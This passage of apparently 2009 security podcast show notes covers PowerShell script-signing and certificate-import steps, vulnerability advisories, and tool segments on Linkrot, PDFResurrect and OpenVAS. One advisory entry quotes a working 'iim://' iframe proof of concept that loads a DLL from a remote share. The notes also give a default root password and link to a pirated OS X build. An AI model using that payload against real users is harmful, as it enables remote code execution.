# YqxATMTVlyh1yb2pRA8Ar8mmGaB7fSro/LONEjSr0uto11lnixbBNUQCF7bjpeYS
# CUxfNC5pynPhp6nF4XdHwPDb3u0aNNJ9bCtlTN6e3pi3+QP1Fi0aFNVBIGD2Bb4c
# BiY7HRQK/Sgj3N+m9s4xPkVJcKOajRg=
# SIG # End signature block

Execute the script once again:

PS C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin> .\script.ps1

Do you want to run software from this untrusted publisher?
File C:\Program Files\Microsoft SDKs\Windows\v7.0\Bin\script.ps1 is published
by CN=PowerShell User and is not trusted on your system. Only run scripts from
trusted publishers.
[V] Never run  [D] Do not run  [R] Run once  [A] Always run  [?] Help
(default is “D”):r
fe80::c89c:9d2c:15ac:1b87%11
10.25.0.99
fe80::681b:b2c1:bab0:70d5%18
192.168.193.1
fe80::d936:3768:d735:ab%20
192.168.85.1

We get prompted to [V] Never run  [D] Do not run  [R] Run once  [A] Always run  [?] Help (default is “D”).  I selected r and the script ran correctly providing me with the output of my interfaces.  It is important to note that if the certificate is missing from your store the script will fail.

To run signed scripts on another system you have to export the PowerShell certificate that was used to sign the script from the Trusted Root Certification Authorities container. As a side note, the certificate in Trusted Publishers can also be exported and imported to prevent the first-time prompt.

From the Current User certificate store, go to the Trusted Root Certification Authorities container and locate the PowerShell Local Certificate Root certificate.  Right-click on it and click All Tasks, Export.

Leave the format at the default DER format and click Next.

Enter your desired path and name for the exported certificate, and click Next.  On the target machine, open certmgr.msc and locate the Trusted Root Certification Authorities container.

Expand the container to find the Certificates store.  Right-click on it, select All Tasks, and choose Import.  Click Next to continue, browse to the certificate that you just exported, and click Next.  I usually choose Automatically select the certificate store based on the type of certificate.  Read the security warning and click Yes to install the certificate.  Confirm afterwards that the certificate landed under Trusted Root Certification Authorities; in any other store the signature will still not verify.  Your signed script should now run on the new computer.  Note that PowerShell will prompt you the first time it’s run unless you also import the Trusted Publishers certificate.
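The same export, import and first-run check done from PowerShell instead of certmgr.msc, as an added example that is not code from the original post. It assumes the self-signed root created in the walkthrough with subject CN=PowerShell Local Certificate Root and a signed .\script.ps1; the file path C:\temp\PSRoot.cer and the function names are choices made here.

```powershell
# Added example, not from the original post. Assumes the self-signed
# 'CN=PowerShell Local Certificate Root' from the walkthrough and a signed
# .\script.ps1; the file path and function names are made up here.

function Export-PSRoot {
    # Signing machine: write the root CA as DER. Only the public certificate
    # is exported; the private key stays in this user's store.
    param([string]$Path = 'C:\temp\PSRoot.cer')
    $root = Get-ChildItem Cert:\CurrentUser\Root |
        Where-Object { $_.Subject -eq 'CN=PowerShell Local Certificate Root' } |
        Select-Object -First 1
    if (-not $root) { throw 'Root not found in CurrentUser\Root; was makecert run?' }
    $der = $root.Export([System.Security.Cryptography.X509Certificates.X509ContentType]::Cert)
    [System.IO.File]::WriteAllBytes($Path, $der)
    return $root.Thumbprint      # note this down; the import below pins it
}

function Import-PSRoot {
    # Target machine: add the file to Trusted Root Certification Authorities
    # for the current user. The thumbprint check refuses a file swapped in transit.
    param([string]$Path = 'C:\temp\PSRoot.cer',
          [Parameter(Mandatory=$true)][string]$ExpectedThumbprint)
    $cert = New-Object -TypeName System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList $Path
    if ($cert.Thumbprint -ne $ExpectedThumbprint) {
        throw "Thumbprint mismatch ($($cert.Thumbprint)); refusing to trust this root"
    }
    $store = New-Object -TypeName System.Security.Cryptography.X509Certificates.X509Store -ArgumentList 'Root', 'CurrentUser'
    $store.Open('ReadWrite')
    $store.Add($cert)    # Windows shows the same root-CA warning certmgr.msc does
    $store.Close()
}

function Add-TrustedPublisher {
    # Optional: put the signer certificate in Trusted Publishers so the first
    # run does not prompt. The signer cert travels inside the signature block.
    param([string]$Script = '.\script.ps1')
    $sig = Get-AuthenticodeSignature $Script
    if (-not $sig.SignerCertificate) { throw "$Script carries no signature" }
    $store = New-Object -TypeName System.Security.Cryptography.X509Certificates.X509Store -ArgumentList 'TrustedPublisher', 'CurrentUser'
    $store.Open('ReadWrite')
    $store.Add($sig.SignerCertificate)
    $store.Close()
}

function Test-SignedScript {
    # Under AllSigned only 'Valid' runs. A root that is not trusted typically
    # shows up as UnknownError with a "terminated in a root certificate which
    # is not trusted" message, which means the import went to the wrong store.
    param([string]$Script = '.\script.ps1')
    $sig = Get-AuthenticodeSignature $Script
    Write-Host ("{0}: {1}" -f $sig.Status, $sig.StatusMessage)
    return ($sig.Status -eq 'Valid')
}

# Signing machine:
#   $tp = Export-PSRoot
# Target machine (paste the thumbprint printed above):
#   Import-PSRoot -ExpectedThumbprint $tp
#   Add-TrustedPublisher
#   Test-SignedScript
```

Use 'LocalMachine' instead of 'CurrentUser' in the two store constructors to trust the root for every user on the target; that needs an elevated prompt. The thumbprint pin is the part worth keeping even if you stay with certmgr.msc: a root certificate is exactly the kind of file that is easy to swap on the way to the second machine.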

2009
11.25

InfoSec Daily Podcast

 

Tonight we have Part Two of our interview with special guest Pieter Swanepoel. Pieter is the President of Swan Security, which specializes in mainframe security.

2009
11.24

InfoSec Daily Podcast

 

Tonight we have Part One of our interview with special guest Pieter Swanepoel. Pieter is the President of Swan Security, which specializes in mainframe security.

2009
11.23

ISD Episode 14

InfoSec Daily Podcast

 

Vulnerabilities of Interest:

  1. VUPEN is reporting that a vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to compromise a vulnerable system. This issue is caused by a dangling pointer in the Microsoft HTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via the “getElementsByTagName()” method, which could allow attackers to crash an affected browser or execute arbitrary code by tricking a user into visiting a malicious web page.
  2. NTP ‘ntpq’ Stack Buffer Overflow Vulnerability – The ‘ntpq’ command is prone to a stack-based buffer-overflow vulnerability.  Successful exploits will crash the affected utility. Code execution may also be possible, but has not been confirmed.
  3. Cisco VPN Client “cvpnd” Service Local Denial of Service – A vulnerability has been reported in Cisco VPN Client, which can be exploited by malicious, local users to cause a DoS (Denial of Service).  The vulnerability is caused by improper error handling within the cvpnd.exe binary, which can be exploited to terminate the cvpnd service along with all active VPN sessions. The vulnerability is reported in versions prior to 5.0.06.0100. The solution is to update to version 5.0.06.0100.
  4. Linux Kernel ‘NFS filename’ Local Denial of Service Vulnerability – The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to trigger a kernel oops, resulting in a denial-of-service condition.
  5. Linux Kernel ‘exit_notify()’ CAP_KILL Verification Local Privilege Escalation Vulnerability – The Linux kernel is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code with superuser privileges, resulting in a complete compromise of the affected computer. Versions prior to Linux kernel 2.6.29-git14 are vulnerable. An exploit is available in the wild.
  6. Linux Kernel CIFS Remote Buffer Overflow Vulnerability – The Linux Kernel is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. The issue affects Linux Kernel 2.6.29; other versions may also be vulnerable.
  7. Linux Kernel nfsd ‘CAP_MKNOD’ Unauthorized Access Vulnerability – The Linux Kernel is prone to an unauthorized-access vulnerability that can occur when users with certain capabilities connect to the ‘nfsd’ service. Attackers with authenticated access to the affected application can exploit this issue to perform privileged operations on a vulnerable computer; this may aid in further attacks. It can be exploited using readily available tools.
  8. ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability – ISC BIND is prone to a remote denial-of-service vulnerability because the software fails to properly handle specially crafted dynamic update requests. Successfully exploiting this issue allows remote attackers to crash affected DNS servers, denying further service to legitimate users. Other attacks are also possible. Versions prior to BIND 9.4.3-P3, 9.5.1-P3, and 9.6.1-P3 are vulnerable. This issue is being actively exploited in the wild.
  9. Sun Solaris OpenSSL TLS Session Renegotiation Plaintext Injection Vulnerability -  Sun has acknowledged a vulnerability in Solaris, which can be exploited by malicious people to manipulate certain data. A final resolution is pending completion.


News Items of Interest:


News item 1: (http://www.v3.co.uk/v3/news/2253708/insurers-found-facebook)


News item 2: (http://www.itworldcanada.com/news/reputation-based-security-to-dominate/139392)


News item 3: (http://www.theregister.co.uk/2009/11/20/snow_leopard_atom_support/)

A custom version of OS X 10.6.2 is distributed here. More about how to install the patch is available from this forum at InsanelyMac.

News item 4: (http://blogs.zdnet.com/green/?p=8783)

News item 5: (http://news.cnet.com/8301-13860_3-10402783-56.html?part=rss&subj=news&tag=2547-1_3-0-20)

News item 6: (http://www.sciencedaily.com/releases/2009/11/091118160627.htm)

News item 7: (http://news.softpedia.com/news/Comcast-Domain-Hijackers-Indicted-127635.shtml)

Tech Segment:

Linkrot scans a site for inaccessible links (HTTP errors such as 404 and 500) and saves a log of bad links that you can open in Excel.  It’s a Windows console application developed in C# (.NET 2.0). Simple, single-threaded crawling for dead, broken and dangling links.

C:\Users\rhayes\Downloads>linkrot

Finds inaccessible links in a website (single thread version).
All links are written to Links.txt.
Bad links are written to Error.txt.

Use:             linkrot.exe <url>
Example:         linkrot.exe http://www.linkrot.be/
Example:         linkrot.exe http://www.linkrot.be/ >> logfile.txt

Error level -1:  Parameter fault, given url is not accessible.
Error level  0:  All went well, no bad links found.
Error level  1:  Bad links found, see error log for details.

Comments to info@patrick.nl, www.patrick.nl.

C:\Users\rhayes\Downloads>linkrot http://www.irongeek.com >>logfile.txt

logfile.txt:
Resolved  http://www.irongeek.com/
Resolved  http://www.dreamhost.com/r.cgi?155413
Resolved  http://www.irongeek.com/i.php
Resolved  http://www.irongeek.com/i.php?page=security/hackingillustrated
Resolved  http://www.irongeek.com/i.php?page=security/security
Resolved  http://www.irongeek.com/i.php?page=mobile-device-hacking
Resolved  http://www.irongeek.com/i.php?page=security/code
Resolved  http://www.irongeek.com/i.php?page=reviews/reviews
Resolved  http://feedproxy.google.com/IrongeeksSecuritySite
Resolved  http://www.irongeek.com/browserinfo.php
Resolved  http://www.irongeek.com/security-podcasts.php
Resolved  http://www.irongeek.com/i.php?page=hoosier
Resolved  http://www.irongeek.com/newscat.php
Resolved  http://www.irongeek.com/i.php?page=links
Resolved  http://www.irongeek.com/i.php?page=contact
Resolved  http://www.irongeek.com/i.php?page=forum/index
Resolved  http://www.irongeek.com/i.php?page=workout/workout
Resolved  http://www.irongeek.com/i.php?page=fitness/nutrition
Resolved  http://www.irongeek.com/i.php?page=fitness/supplements
Resolved  http://www.irongeek.com/i.php?page=humor/humor
Resolved  http://www.irongeek.com/i.php?page=advertise
Resolved  http://www.irongeek.com/i.php?page=hire-adrian-for-security-or-tech-w
Resolved  http://www.irongeek.com/i.php?page=campuses-that-use-irongeek-for-tea
Resolved  http://www.irongeek.com/fed-watch.php

Links.txt
Status    Found on page    Link    Milliseconds    Content type
Resolved    http://www.irongeek.com/    http://www.irongeek.com/    9219    text/html
Resolved    http://www.irongeek.com/    http://www.dreamhost.com/r.cgi?155413    2958    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php    1375    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=security/hackingillustrated    1415    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=security/security    1876    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=mobile-device-hacking    3471    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=security/code    755    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=reviews/reviews    765    text/html
Resolved    http://www.irongeek.com/    http://feedproxy.google.com/IrongeeksSecuritySite    12794    text/xml; charset=UTF-8
Resolved    http://www.irongeek.com/    http://www.irongeek.com/browserinfo.php    1620    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/security-podcasts.php    5396    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=hoosier    283    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/newscat.php    453    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=links    221    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=contact    261    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=forum/index    140    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=workout/workout    342    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=fitness/nutrition    145    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=fitness/supplements    309    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=humor/humor    215    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=advertise    183    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana    169    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education    210    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/fed-watch.php    3629    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=books    466    text/html
Resolved    http://www.irongeek.com/    http://www.printfection.com/irongeek/    5934    text/html; charset=UTF-8
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=about    1824    text/html

Error.txt:
Error message    Found on page    Bad link    Milliseconds
Timeout    http://www.irongeek.com/    http://www.packetsniffers.org/    21495
Timeout    http://www.irongeek.com/    http://hackhound.org/    21106
Timeout    http://www.irongeek.com/    http://hackhound.org/images/button2.gif    21007
NotFound    http://www.irongeek.com/i.php?page=security/hackingillustrated    http://leebaird.com/Me/Hacking.html    559
Timeout    http://www.irongeek.com/i.php?page=security/hackingillustrated    http://phreaknic.wilpig.org/    21208

Linkrot is available as a command-line utility and as source code here: Linkrot

2009
11.20

ISD Episode 13 (the suck!)

InfoSec Daily Podcast

 

Vulnerabilities of Interest:

  1. file CDF File Parsing Multiple Buffer Overflow Vulnerabilities – The ‘file’ command is prone to multiple buffer-overflow vulnerabilities because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Versions prior to ‘file’ 5.02 are vulnerable.
  2. Sun Java Runtime Environment Multiple Unspecified Same Origin Policy Violation Vulnerabilities – Sun Java Runtime Environment is prone to multiple unspecified vulnerabilities that allow attackers to bypass the same-origin policy. This issue occurs because the application fails to properly enforce the same-origin policy for Java applets. An attacker may create a malicious applet that is loaded from a remote system to circumvent network access restrictions. The following are affected: JDK and JRE 6 Update 6 and earlier, JDK and JRE 5.0 Update 15 and earlier, SDK and JRE 1.4.2_17 and earlier, and SDK and JRE 1.3.x_22 and earlier
  3. Sun Java Runtime Environment XML Data Processing Multiple Vulnerabilities – Sun Java Runtime Environment is prone to multiple remote vulnerabilities. An attacker can exploit these issues to obtain sensitive information or crash the affected application, denying service to legitimate users. These issues affect the following versions on Solaris, Linux, and Windows platforms: JDK and JRE 6 Update 6 and earlier as well as JDK and JRE 5.0 Update 15 and earlier
  4. Sun Java SE Java Management Extensions (JMX) Unspecified Unauthorized Access Vulnerability – JMX is prone to an unspecified unauthorized-access vulnerability.  The vulnerability allows a JMX client to perform unauthorized actions on a computer running JMX with local monitoring enabled. The issue affects the following versions for Windows, Solaris, and Linux: JDK and JRE 6 Update 6 and earlier as well as  JDK and JRE 5.0 Update 15 and earlier
  5. Sun Java Runtime Environment Virtual Machine Privilege Escalation Vulnerability – Sun Java Runtime Environment Virtual Machine is prone to a privilege-escalation vulnerability when running untrusted applications or applets. Successful exploits may allow attackers to read, write, or execute arbitrary local files in the context of the user running an untrusted application in the affected virtual machine. This may result in a compromise of the underlying system. This issue affects the following versions: JDK and JRE 6 Update 6 and earlier, JDK and JRE 5.0 Update 15 and earlier, and SDK and JRE 1.4.2_17 and earlier
  6. Hitachi Multiple Products Remote Code Execution Vulnerabilities – Multiple products from Hitachi are prone to multiple code-execution vulnerabilities. A remote attacker could exploit these issues by enticing a victim to open a malicious file. Successfully exploiting these issues would allow the attacker to execute arbitrary code in the context of the currently logged-in user or cause denial-of-service conditions.
  7. IBM Installation Manager ‘iim://’ URI Handling Remote Code Execution Vulnerability – IBM Installation Manager is prone to a remote code-execution vulnerability. Attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions. The following products that include Installation Manager are vulnerable: IBM Rational Robot and IBM Rational Team Concert. The following proof of concept is available: <iframe src='iim://" -vm \\www.example.com\uncshare\sh.dll -url "'></iframe> Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
  8. Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities – Omni-NFS is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to properly bounds-check user-supplied network data before copying it into an insufficiently sized memory buffer. The issues affect both server and client. Exploiting these issues allows attackers to execute arbitrary machine code in the context of users running the affected application. Failed attempts will likely crash the application, resulting in denial-of-service conditions. Omni-NFS 5.2 is vulnerable; other versions may also be affected. Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. Exploits are also available in the wild.
  9. Hitachi Device Manager IPv6 Security Bypass Vulnerability – Hitachi Device Manager and JP1/HiCommand are prone to a security-bypass vulnerability because of an unspecified error related to IPv6 functionality. Very few technical details are available as of now, though we will continue to monitor this one.
  10. Hitachi Multiple Products GIF File Parsing Buffer Overflow Vulnerability – Multiple Hitachi products, including Cosminexus, Processing Kit for XML, and Hitachi Developer’s Kit for Java, are prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
  11. Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability – The Apache ‘mod_proxy_ftp’ module is prone to a denial-of-service vulnerability because of a NULL-pointer dereference. Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.  A working commercial exploit is available through Intevydis; otherwise no exploit is publicly available or known to be circulating in the wild.
  12. WebKit Preflight Request Same-Origin Policy Bypass Vulnerability – WebKit is prone to a vulnerability that lets attackers bypass the same-origin policy.  Attackers can exploit this issue to access resources from another origin in the context of another domain. This can facilitate cross-site request-forgery attacks.
  13. Sun Solaris Samba Information Disclosure and Denial of Service – Sun has acknowledged some vulnerabilities in Samba in Solaris, which can be exploited by malicious users to disclose sensitive information and cause a DoS (Denial of Service).

News Items of Interest:



News item 1: (http://www.theglobeandmail.com/news/technology/rim-security-chief-warns-of-future-smart-phone-attacks/article1368297/)

News item 2: (http://www.h-online.com/security/news/item/Fedora-12-allows-users-install-privilege-Update-863623.html)

News item 3: (http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1374839,00.html)

News item 4: (http://www.reuters.com/article/rbssTechMediaTelecomNews/idUSPEK26455220091119?rpc=401)

News item 5: (http://www.cio.com/article/508029/How_to_Hack_China_for_Just_1_800?source=rss_security)

News item 6: (http://www.informationweek.com/news/government/policy/showArticle.jhtml?articleID=221900107)


Tech Segment:

PDFResurrect is a tool aimed at analyzing PDF documents. The PDF format allows for previous document changes to be retained in a more recent version of the document, thereby creating a running history of changes for the document. This tool attempts to extract all previous versions while also producing a summary of changes between versions. This tool can also “scrub” or write data over the original instances of PDF objects that have been modified or deleted, in an effort to disguise information from previous versions that might not be intended for anyone else to read.

This project is released under the GNU GPLv3 license. So have at it!

Download PDFResurrect v0.9
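The mechanism PDFResurrect relies on, as an added example that is not the tool’s own code: each incremental save appends new objects, a fresh xref table and a trailer ending in %%EOF, and the new trailer’s /Prev entry points back at the previous xref table, so every earlier revision is still in the file and can be cut out at its %%EOF. The function name, the input path .\sample.pdf and the -vN output naming are assumptions made here.

```powershell
# Added example, not pdfresurrect's own code. Recovers every revision left in
# a PDF by incremental updates and cross-checks the count against the trailer
# /Prev chain. Input path, output naming and function name are assumptions.

function Get-PdfRevisions {
    param([Parameter(Mandatory=$true)][string]$Path)

    $bytes = [System.IO.File]::ReadAllBytes($Path)
    # Latin-1 maps each byte to one char, so string offsets equal byte offsets
    $text = [System.Text.Encoding]::GetEncoding(28591).GetString($bytes)

    # 1. Each %%EOF ends one revision; the first one found is the oldest.
    $ends = @()
    $i = $text.IndexOf('%%EOF')
    while ($i -ge 0) {
        $end = $i + 5
        # keep the CR/LF after the marker so every cut is a complete file
        while ($end -lt $text.Length -and ($text[$end] -eq "`r" -or $text[$end] -eq "`n")) { $end++ }
        $ends += $end
        $i = $text.IndexOf('%%EOF', $end)
    }

    # 2. Cross-check by walking /Prev from the last startxref. One hop per %%EOF
    #    is the normal case. Fewer hops means cross-reference streams (PDF 1.5+,
    #    no 'trailer' keyword); a /Linearized file has two of each for a single
    #    revision; a cycle is a malformed or hostile file, hence the cap.
    $hops = 0
    $seen = @{}
    $sx = $text.LastIndexOf('startxref')
    if ($sx -ge 0 -and $text.Substring($sx) -match 'startxref\s+(\d+)') {
        $offset = [int]$matches[1]
        while ($offset -gt 0 -and $offset -lt $text.Length -and -not $seen.ContainsKey($offset) -and $hops -lt 64) {
            $seen[$offset] = $true
            $hops++
            $t = $text.IndexOf('trailer', $offset)
            if ($t -lt 0) { break }
            $close = $text.IndexOf('>>', $t)
            if ($close -lt 0) { break }
            if ($text.Substring($t, $close - $t) -match '/Prev\s+(\d+)') { $offset = [int]$matches[1] }
            else { $offset = -1 }
        }
    }
    $linearized = $text.Substring(0, [Math]::Min(1024, $text.Length)) -match '/Linearized'

    # 3. Write each revision as its own file; -v1 is the original document.
    $dir  = [System.IO.Path]::GetDirectoryName((Resolve-Path $Path).ProviderPath)
    $base = [System.IO.Path]::GetFileNameWithoutExtension($Path)
    $n = 0
    foreach ($e in $ends) {
        $n++
        $out = Join-Path $dir ("{0}-v{1}.pdf" -f $base, $n)
        $fs = [System.IO.File]::Create($out)
        $fs.Write($bytes, 0, $e)
        $fs.Close()
        Write-Host ("{0}  {1,8} bytes" -f $out, $e)
    }
    Write-Host ("revisions by %%EOF: {0}   xref tables on /Prev chain: {1}   linearized: {2}" -f $ends.Count, $hops, $linearized)
    return $ends.Count
}

Get-PdfRevisions -Path .\sample.pdf
```

Diffing adjacent -vN files (or opening them side by side) shows what each save changed. The cross-check matters in practice: a count of one with a large file, or a /Prev chain shorter than the %%EOF count, is a hint that the history sits in cross-reference streams or compressed object streams that this byte-level cut does not unpack, which is where a purpose-built tool such as PDFResurrect earns its keep.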

2009
11.19

ISD Episode 12

InfoSec Daily Podcast

 

Vulnerabilities of Interest:

  1. Kolab Server ClamAV Archive Handling Security Bypass – Some security issues have been reported in Kolab Server, which can potentially be exploited by malware to bypass certain security restrictions. The security issues are caused due to errors in the handling of certain file types in combination with ClamAV. This can be exploited to bypass security restrictions specified for certain files. Solution is to upgrade the ClamAV package to version 0.95.3.
  2. Kaspersky Anti-Virus 2010 kl1.sys Denial of Service Vulnerability – A vulnerability has been discovered in Kaspersky Anti-Virus 2010, which can be exploited by malicious, local users to cause a DoS (Denial of Service).  The vulnerability is caused by an error in the kl1.sys driver when handling IOCTLs. This can be exploited to dereference invalid memory and cause a kernel crash via a specially crafted 0x0022C008 IOCTL. The vulnerability is confirmed in version 9.0.0.463. Other versions may also be affected.  Solution is to update to version 9.0.0.736.
  3. Sun Java SE Multiple Security Vulnerabilities – Sun has released updates to address multiple vulnerabilities in Java SE. Very little technical information is currently available on these issues. These issues are addressed in the following releases: JDK and JRE 6 Update 15, JDK and JRE 5.0 Update 20, SDK and JRE 1.4.2_22 and SDK and JRE 1.3.1_26
  4. Serv-U Web Client HTTP Request Remote Buffer Overflow Vulnerability – Serv-U Web Client is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Serv-U Web Client 9.0.0.5 is vulnerable; other versions may also be affected. Exploits are available in the wild.
  5. RhinoSoft Serv-U FTP Server TEA Decoder Remote Stack Buffer Overflow Vulnerability – RhinoSoft Serv-U FTP Server is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Serv-U 9.0.0.5 is vulnerable; other versions may also be affected.
  6. Sun Java Web Start and Java Plug-in JAR File Privilege Escalation Vulnerability – Sun Java Web Start and Java Plug-in are prone to a privilege-escalation vulnerability. This issue occurs when the affected applications parse a JAR file that is also a legitimate GIF image file. An attacker may exploit this issue to obtain sensitive information (such as HTTP session cookies) or to perform actions as legitimate users of a web application. This may aid in further attacks. NOTE: This issue was previously covered in BID 32620 (Sun Java Web Start and Java Plug-in Multiple Privilege Escalation Vulnerabilities), but has been given its own record to better document the issue. The following versions are affected: JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier, and SDK and JRE 1.3.1_23 and earlier
  7. IBM SolidDB ‘solid.exe’ Denial of Service Vulnerability – IBM SolidDB is prone to a remote denial-of-service vulnerability. An attacker may leverage this issue to crash the affected application, denying service to affected users. This issue affects SolidDB 6.30.0.29 and 6.30.0.33; other versions may also be affected.  Exploits are available in the wild.
  8. Multiple Vendor TLS Protocol Session Renegotiation Security Vulnerability – Same issue as before, with more vendors being added.  Again, check with your vendor for updates on this one.

News Items of Interest:


News item 1: (http://www.domainb.com/infotech/itnews/20091117_indo-pak_cyber_war.html)

News item 2: (http://www.networkworld.com/news/2009/111709-endpoint-security.html)

News item 3: (http://www.jdjournal.com/2009/11/17/hackers-targeting-large-law-firms-in-increasing-numbers/)

News item 4: (http://www.out-law.com//default.aspx?page=10530)

News item 5: (http://www.pcadvisor.co.uk/news/index.cfm?…id=3206496&)

News item 6: (http://www.infoworld.com/d/security-central/64-bit-windows-safer-claims-microsoft-787?source=rss_infoworld_news)

Tech Segment:


OpenVAS

OpenVAS is a new security assessment tool designed as an alternative to Nessus.  According to the OpenVAS website:

OpenVAS stands for Open Vulnerability Assessment System and is a network security scanner with associated tools like a graphical user front-end. The core component is a server with a set of network vulnerability tests (NVTs) to detect security problems in remote systems and applications.

OpenVAS products are Free Software under GNU GPL and a fork of Nessus.

OpenVAS is designed to run on Linux, not on Windows.  An ideal approach is to download the BackTrack virtual appliance and run OpenVAS inside it; a Linux-based virtual appliance still runs on a Windows computer.

Here are basic instructions for installing OpenVAS onto the virtual machine:

First, you will need either VMware Player, VMware Server or VMware Workstation on your PC.  You will then need to download the BackTrack virtual appliance:

Once you get BackTrack up and running, you can log in as root (password: toor) by default.  Launch Firefox so that we can grab the latest version of the OpenVAS packages from the following website: apt.intevation.de/dists/lenny/openvas/binary-i386/?1246159210

libopenvas2_2.0.4-1intevation1_i386.deb
libopenvasnasl2_2.0.2-1intevation1_i386.deb
openvas-client_2.0.5-1intevation1_i386.deb
openvas-plugins_1.0.6-1intevation2_i386.deb
openvas-server_2.0.3-1intevation1_i386.deb

Grab the GNU Pth, GPGME and GDChart libraries that the packages depend on:
packages.debian.org/lenny/i386/libpth20/download
packages.debian.org/lenny/i386/libgpgme11/download
packages.debian.org/lenny/i386/libgdchart-gd2-noxpm/download

Finally, you will need to grab HTMLDOC: htmldoc.org/software.php?VERSION=1.9.x-r1586&FILE=htmldoc/snapshots/htmldoc-1.9.x-r1586.tar.gz

wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/libopenvas2_2.0.4-1intevation1_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/libopenvasnasl2_2.0.2-1intevation1_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/openvas-client_2.0.5-1intevation1_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/openvas-plugins_1.0.6-1intevation2_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/openvas-server_2.0.3-1intevation1_i386.deb
wget http://http.us.debian.org/debian/pool/main/p/pth/libpth20_2.0.7-12_i386.deb
wget http://http.us.debian.org/debian/pool/main/g/gpgme1.0/libgpgme11_1.1.6-2_i386.deb
wget http://http.us.debian.org/debian/pool/main/libg/libgdchart-gd2/libgdchart-gd2-noxpm_0.11.5-6_i386.deb
wget ftp://nic.funet.fi/.m/mirrors2/ftp.easysw.com/pub/htmldoc/snapshots/htmldoc-1.9.x-r1586.tar.gz

Open the terminal and run the following commands in order:

dpkg -i libopenvas2_2.0.4-1intevation1_i386.deb
ldconfig
dpkg -i libpth20_2.0.7-12_i386.deb
dpkg -i libgpgme11_1.1.6-2_i386.deb
dpkg -i libopenvasnasl2_2.0.2-1intevation1_i386.deb
dpkg -i openvas-plugins_1.0.6-1intevation2_i386.deb
dpkg -i openvas-server_2.0.3-1intevation1_i386.deb
dpkg -i libgdchart-gd2-noxpm_0.11.5-6_i386.deb
dpkg -i openvas-client_2.0.5-1intevation1_i386.deb
tar -zxvf htmldoc-1.9.x-r1586.tar.gz
cd htmldoc-1.9.x-r1586
./configure
make
make install
openvas-adduser

root@bt:~/htmldoc-1.9.x-r1586# openvas-adduser
/usr/sbin/openvas-adduser: 75: 0: not found
Using /var/tmp as a temporary file holder.

Add a new openvasd user
---------------------------------


Login : admin
Authentication (pass/cert) [pass] : pass
Login password :
Login password (again) :

User rules
---------------
openvasd has a rules system which allows you to restrict the hosts that admin has the right to test.
For instance, you may want him to be able to scan his own host only.

Please see the openvas-adduser(8) man page for the rules syntax.

Enter the rules for this user, and hit ctrl-D once you are done:
(the user can have an empty rules set)



Login             : admin
Password          : ***********

Rules             :



Is that ok? (y/n) [y] y
user added.

openvas-mkcert

